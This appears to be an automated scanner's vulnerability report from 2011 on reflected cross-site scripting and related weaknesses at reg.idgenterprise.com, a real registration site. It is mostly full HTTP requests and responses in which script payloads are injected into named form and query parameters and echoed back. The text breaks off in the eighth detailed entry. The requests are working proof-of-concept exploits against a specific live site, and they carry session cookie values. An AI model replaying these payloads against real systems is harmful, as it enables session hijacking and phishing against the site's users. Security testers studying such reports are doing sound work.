XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, reg.idgenterprise.com

Report generated by XSS.CX at Tue Nov 22 11:41:21 CST 2011.

Loading



1. Cross-site scripting (reflected)

1.1. http://reg.idgenterprise.com/reg/cio/form/200006520 [SOURCE parameter]

1.2. http://reg.idgenterprise.com/reg/cio/form/200006520 [codetype parameter]

1.3. http://reg.idgenterprise.com/reg/cio/form/200006520 [elqguid parameter]

1.4. http://reg.idgenterprise.com/reg/cio/form/200006520 [pagename parameter]

1.5. http://reg.idgenterprise.com/reg/cio/form/200006520 [pagetype parameter]

1.6. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [attribute%5B%27brand%27%5D parameter]

1.7. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [attribute%5B%27leadAccelId%27%5D parameter]

1.8. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [attribute%5B%27referrer%27%5D parameter]

1.9. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [codetype parameter]

1.10. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [pagename parameter]

1.11. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [pagetype parameter]

1.12. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [segment%5B%27address1%27%5D parameter]

1.13. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [segment%5B%27address2%27%5D parameter]

1.14. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [segment%5B%27city%27%5D parameter]

1.15. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [segment%5B%27company%27%5D parameter]

1.16. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [segment%5B%27emailAddress%27%5D parameter]

1.17. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [segment%5B%27firstName%27%5D parameter]

1.18. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [segment%5B%27lastName%27%5D parameter]

1.19. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [segment%5B%27mobile%27%5D parameter]

1.20. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [segment%5B%27phone%27%5D parameter]

1.21. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [segment%5B%27postalCode%27%5D parameter]

1.22. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [source%5B%27pdrs%27%5D parameter]

1.23. http://reg.idgenterprise.com/reg/cio/form/200006520 [Referer HTTP header]

2. Cross-domain Referer leakage

2.1. http://reg.idgenterprise.com/reg/cio/form/200006520

2.2. http://reg.idgenterprise.com/reg/cio/form/submit/200006520

3. Cross-domain script include

3.1. http://reg.idgenterprise.com/reg/cio/form/200006520

3.2. http://reg.idgenterprise.com/reg/cio/form/submit/200006520

4. Cookie without HttpOnly flag set

4.1. http://reg.idgenterprise.com/reg/cio/form/200006520

4.2. http://reg.idgenterprise.com/reg/cio/form/submit/200006520

4.3. http://reg.idgenterprise.com/resources/js/basic-registration.js

4.4. http://reg.idgenterprise.com/resources/js/jquery-1.4.2.min.js

4.5. http://reg.idgenterprise.com/resources/styles/default.css



1. Cross-site scripting (reflected)  next
There are 23 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://reg.idgenterprise.com/reg/cio/form/200006520 [SOURCE parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/200006520

Issue detail

The value of the SOURCE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f90c7"><script>alert(1)</script>908744f70a was submitted in the SOURCE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLHf90c7"><script>alert(1)</script>908744f70a&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://resources.cio.com/ccd/show/200006520/00457660054375CIOLJOA2UVHLH/

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:56:01 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:07:13 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="source['pdrs']" id="source['pdrs']" value="00457660054375CIOLJOA2UVHLHf90c7"><script>alert(1)</script>908744f70a" />
...[SNIP]...

1.2. http://reg.idgenterprise.com/reg/cio/form/200006520 [codetype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/200006520

Issue detail

The value of the codetype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bb69"><script>alert(1)</script>d947bbdcf01 was submitted in the codetype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h7bb69"><script>alert(1)</script>d947bbdcf01&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://resources.cio.com/ccd/show/200006520/00457660054375CIOLJOA2UVHLH/

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:56:02 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:07:14 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<form name="basic_registration" action="/reg/cio/form/submit/200006520?codetype=h7bb69"><script>alert(1)</script>d947bbdcf01&pagename=pageName|Webcast:LG:16021:Oracle Database Appliance&#151Engineered for Simplicity:Download&pagetype=prop14|Webcast" method="POST">
...[SNIP]...

1.3. http://reg.idgenterprise.com/reg/cio/form/200006520 [elqguid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/200006520

Issue detail

The value of the elqguid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a76d6"><script>alert(1)</script>c5cce62a17d was submitted in the elqguid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cfa76d6"><script>alert(1)</script>c5cce62a17d HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://resources.cio.com/ccd/show/200006520/00457660054375CIOLJOA2UVHLH/

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:56:04 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:07:16 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" id="attribute['leadAccelId']" name="attribute['leadAccelId']" value="aeb382d1-26b1-419c-b15b-6fa9d79185cfa76d6"><script>alert(1)</script>c5cce62a17d">
...[SNIP]...

1.4. http://reg.idgenterprise.com/reg/cio/form/200006520 [pagename parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/200006520

Issue detail

The value of the pagename request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22efd"><script>alert(1)</script>094d21cb6ac was submitted in the pagename parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity22efd"><script>alert(1)</script>094d21cb6ac&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://resources.cio.com/ccd/show/200006520/00457660054375CIOLJOA2UVHLH/

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:56:03 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:07:15 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<form name="basic_registration" action="/reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle Database Appliance&#151Engineered for Simplicity22efd"><script>alert(1)</script>094d21cb6ac:Download&pagetype=prop14|Webcast" method="POST">
...[SNIP]...

1.5. http://reg.idgenterprise.com/reg/cio/form/200006520 [pagetype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/200006520

Issue detail

The value of the pagetype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7155a"><script>alert(1)</script>fff44999732 was submitted in the pagetype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast7155a"><script>alert(1)</script>fff44999732&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://resources.cio.com/ccd/show/200006520/00457660054375CIOLJOA2UVHLH/

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:56:04 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:07:15 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
m name="basic_registration" action="/reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle Database Appliance&#151Engineered for Simplicity:Download&pagetype=prop14|Webcast7155a"><script>alert(1)</script>fff44999732" method="POST">
...[SNIP]...

1.6. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [attribute%5B%27brand%27%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/submit/200006520

Issue detail

The value of the attribute%5B%27brand%27%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a416"><script>alert(1)</script>fba1baf40e617af2b was submitted in the attribute%5B%27brand%27%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle%20Database%20Appliance%E2%80%94Engineered%20for%20Simplicity:Download&pagetype=prop14|Webcast&segment%5B%27emailAddress%27%5D=&segment%5B%27firstName%27%5D=&segment%5B%27lastName%27%5D=&segment%5B%27company%27%5D=&segment%5B%27address1%27%5D=&segment%5B%27address2%27%5D=&segment%5B%27city%27%5D=&segment%5B%27state%27%5D=&segment%5B%27postalCode%27%5D=&segment%5B%27country%27%5D=&segment%5B%27phone%27%5D=&segment%5B%27mobile%27%5D=&segment%5B%27jobTitle%27%5D=&segment%5B%27companySize%27%5D=&segment%5B%27industry%27%5D=&segment%5B%27alert%27%5D=T&segment%5B%27optIn%27%5D=T&segment%5B%27ACD612AE-0B1C-4F42-B96F-98665CE96604%27%5D=376156&segment%5B%27ECD3F782-C70F-4AE6-80CA-CEE09570B532%27%5D=1&segment%5B%2791B9848D-F547-4A14-BF47-3C65F8145235%27%5D=7A3E05EBD67636846E364D0F613D5852&attribute%5B%27brand%27%5D=cio5a416"><script>alert(1)</script>fba1baf40e617af2b&attribute%5B%27leadAccelId%27%5D=aeb382d1-26b1-419c-b15b-6fa9d79185cf&attribute%5B%27referrer%27%5D=http%3A%2F%2Fresources.cio.com%2Fccd%2Fshow%2F200006520%2F00457660054375CIOLJOA2UVHLH%2F&source%5B%27pdrs%27%5D=00457660054375CIOLJOA2UVHLH HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D00457660054375CIOLJOA2UVHLH%3B%20s_sq%3D%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B; s_pers=%20s_pv%3DWebcast%253ALG%253A16021%253AOracle%2520Database%2520Appliance%2526%2523151Engineered%2520for%2520Simplicity%7C1321892748279%3B

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:58:00 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:09:12 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="attribute['brand']" id="attribute['brand']" value="cio5a416"><script>alert(1)</script>fba1baf40e617af2b,cio5a416">
...[SNIP]...

1.7. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [attribute%5B%27leadAccelId%27%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/submit/200006520

Issue detail

The value of the attribute%5B%27leadAccelId%27%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1f44"><script>alert(1)</script>3509690874ce98523 was submitted in the attribute%5B%27leadAccelId%27%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle%20Database%20Appliance%E2%80%94Engineered%20for%20Simplicity:Download&pagetype=prop14|Webcast&segment%5B%27emailAddress%27%5D=&segment%5B%27firstName%27%5D=&segment%5B%27lastName%27%5D=&segment%5B%27company%27%5D=&segment%5B%27address1%27%5D=&segment%5B%27address2%27%5D=&segment%5B%27city%27%5D=&segment%5B%27state%27%5D=&segment%5B%27postalCode%27%5D=&segment%5B%27country%27%5D=&segment%5B%27phone%27%5D=&segment%5B%27mobile%27%5D=&segment%5B%27jobTitle%27%5D=&segment%5B%27companySize%27%5D=&segment%5B%27industry%27%5D=&segment%5B%27alert%27%5D=T&segment%5B%27optIn%27%5D=T&segment%5B%27ACD612AE-0B1C-4F42-B96F-98665CE96604%27%5D=376156&segment%5B%27ECD3F782-C70F-4AE6-80CA-CEE09570B532%27%5D=1&segment%5B%2791B9848D-F547-4A14-BF47-3C65F8145235%27%5D=7A3E05EBD67636846E364D0F613D5852&attribute%5B%27brand%27%5D=cio&attribute%5B%27leadAccelId%27%5D=aeb382d1-26b1-419c-b15b-6fa9d79185cfe1f44"><script>alert(1)</script>3509690874ce98523&attribute%5B%27referrer%27%5D=http%3A%2F%2Fresources.cio.com%2Fccd%2Fshow%2F200006520%2F00457660054375CIOLJOA2UVHLH%2F&source%5B%27pdrs%27%5D=00457660054375CIOLJOA2UVHLH HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D00457660054375CIOLJOA2UVHLH%3B%20s_sq%3D%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B; s_pers=%20s_pv%3DWebcast%253ALG%253A16021%253AOracle%2520Database%2520Appliance%2526%2523151Engineered%2520for%2520Simplicity%7C1321892748279%3B

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:58:02 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:09:14 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="attribute['leadAccelId']" id="attribute['leadAccelId']" value="aeb382d1-26b1-419c-b15b-6fa9d79185cfe1f44"><script>alert(1)</script>3509690874ce98523,aeb382d1-26b1-419c-b15b-6fa9d79185cfe1f44">
...[SNIP]...

1.8. http://reg.idgenterprise.com/reg/cio/form/submit/200006520 [attribute%5B%27referrer%27%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reg.idgenterprise.com
Path:   /reg/cio/form/submit/200006520

Issue detail

The value of the attribute%5B%27referrer%27%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f4e7"><script>alert(1)</script>7be9a3d72296b117c was submitted in the attribute%5B%27referrer%27%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /reg/cio/form/submit/200006520?codetype=h&pagename=pageName|Webcast:LG:16021:Oracle%20Database%20Appliance%E2%80%94Engineered%20for%20Simplicity:Download&pagetype=prop14|Webcast&segment%5B%27emailAddress%27%5D=&segment%5B%27firstName%27%5D=&segment%5B%27lastName%27%5D=&segment%5B%27company%27%5D=&segment%5B%27address1%27%5D=&segment%5B%27address2%27%5D=&segment%5B%27city%27%5D=&segment%5B%27state%27%5D=&segment%5B%27postalCode%27%5D=&segment%5B%27country%27%5D=&segment%5B%27phone%27%5D=&segment%5B%27mobile%27%5D=&segment%5B%27jobTitle%27%5D=&segment%5B%27companySize%27%5D=&segment%5B%27industry%27%5D=&segment%5B%27alert%27%5D=T&segment%5B%27optIn%27%5D=T&segment%5B%27ACD612AE-0B1C-4F42-B96F-98665CE96604%27%5D=376156&segment%5B%27ECD3F782-C70F-4AE6-80CA-CEE09570B532%27%5D=1&segment%5B%2791B9848D-F547-4A14-BF47-3C65F8145235%27%5D=7A3E05EBD67636846E364D0F613D5852&attribute%5B%27brand%27%5D=cio&attribute%5B%27leadAccelId%27%5D=aeb382d1-26b1-419c-b15b-6fa9d79185cf&attribute%5B%27referrer%27%5D=http%3A%2F%2Fresources.cio.com%2Fccd%2Fshow%2F200006520%2F00457660054375CIOLJOA2UVHLH%2F7f4e7"><script>alert(1)</script>7be9a3d72296b117c&source%5B%27pdrs%27%5D=00457660054375CIOLJOA2UVHLH HTTP/1.1
Host: reg.idgenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://reg.idgenterprise.com/reg/cio/form/200006520?SOURCE=00457660054375CIOLJOA2UVHLH&sHdr=0&hPrv=1&codetype=h&pagename=pageName|Webcast%3ALG%3A16021%3AOracle+Database+Appliance%26%23151Engineered+for+Simplicity&pagetype=prop14|Webcast&elqguid=aeb382d1-26b1-419c-b15b-6fa9d79185cf
Cookie: JSESSIONID=abcqD7WZYbXWe8eIX1gpt; NSC_sfh_tfdvsf_benjo=44593c743660; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D00457660054375CIOLJOA2UVHLH%3B%20s_sq%3D%3B%20s_ppv%3D100%3B%20SC_LINKS%3D%3B; s_pers=%20s_pv%3DWebcast%253ALG%253A16021%253AOracle%2520Database%2520Appliance%2526%2523151Engineered%2520for%2520Simplicity%7C1321892748279%3B

Response

HTTP/1.1 200 OK
Date: Mon, 21 Nov 2011 15:58:05 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
nnCoection: close
Set-Cookie: NSC_sfh_tfdvsf_benjo=44593c743660;expires=Mon, 21-Nov-11 16:09:17 GMT;path=/;domain=reg.idgenterprise.com
Content-Length: 31916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
